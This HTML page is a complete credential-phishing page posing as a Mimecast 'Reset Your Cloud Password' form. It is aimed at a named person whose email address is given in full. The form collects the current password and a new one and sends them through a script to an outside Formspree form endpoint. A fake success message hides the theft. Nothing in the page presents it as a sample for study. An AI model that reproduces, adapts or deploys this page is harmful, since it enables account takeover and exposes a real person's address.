<!DOCTYPE html>
<html>
    <head>
        <title>Mimecast Login</title>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" href="form.css">
        <style>
/* Extra small devices (phones, 600px and down) */
@media only screen and (max-width: 600px) {
  }

/* Small devices (portrait tablets and large phones, 600px and up) */
@media only screen and (min-width: 600px) {
  }

/* Medium devices (landscape tablets, 768px and up) */
@media only screen and (min-width: 768px) {
  } 

/* Large devices (laptops/desktops, 992px and up) */
@media only screen and (min-width: 992px) {
  } 

/* Extra large devices (large laptops and desktops, 1200px and up) */
@media only screen and (min-width: 1200px) {
  }
        </style>
     </head>
    <body style="background-color: #1976d2;">
        <div style="text-align: center;">
<img src="mimecast-logo2.png" width="200px" style="padding-top: 30px;" >
        </div>
<div>
<form class="box" action="https://formspree.io/f/mknylykv" method="POST" id="myform" >
  <b><h2 style="text-align: left; color:black;">Reset Your Cloud Password</h2></b>
  <p style="text-align: left;font-family: sans-serif;font-size: 17px;">To prevent unauthorised access to your account,</p>
  <p style="text-align: left;">Email: Gavin.Kiggen@execujet.co.za</p>
<input type="password" name="Password" placeholder="Current Password">
<input type="password" name="password" placeholder="Create new Password">
<input type="password" name="confirm" placeholder="Confirm New Password">
<input type="submit" name="Change Password"placeholder="Reset Password">
<div id="status" style="padding-top: 60px; color: white;"></div>
</form>
</div>
<footer style="margin-top: 500px; text-align: center;">
    <div>
        <p style="color: white;">©2022 Mimecast v1.5.16-1-20220121_1500 </p>
        <a href="https://www.mimecast.com/company/mimecast-trust-center/gdpr-center/privacy-statement/"
    style="text-decoration: none; color: white; ">Privacy</a>
    </div>
    
</footer>
<script>
    var form = document.getElementById("myform");
    
    async function handleSubmit(event) {
      event.preventDefault();
      var status = document.getElementById("status");
      var data = new FormData(event.target);
      fetch(event.target.action, {
        method: form.method,
        body: data,
        headers: {
            'Accept': 'application/json'
        }
      }).then(response => {
        if (response.ok) {
          status.innerHTML = "Password Reset Successfully, Your security is our Priority.";
          form.reset()
        } else {
          response.json().then(data => {
            if (Object.hasOwn(data, 'errors')) {
              status.innerHTML = data["errors"].map(error => error["message"]).join(", ")
            } else {
              status.innerHTML = "Oops! There was a problem submitting your form"
            }
          })
        }
      }).catch(error => {
        status.innerHTML = "Oops! There was a problem submitting your form"
      });
    }
    form.addEventListener("submit", handleSubmit)
</script>

</body>
</html>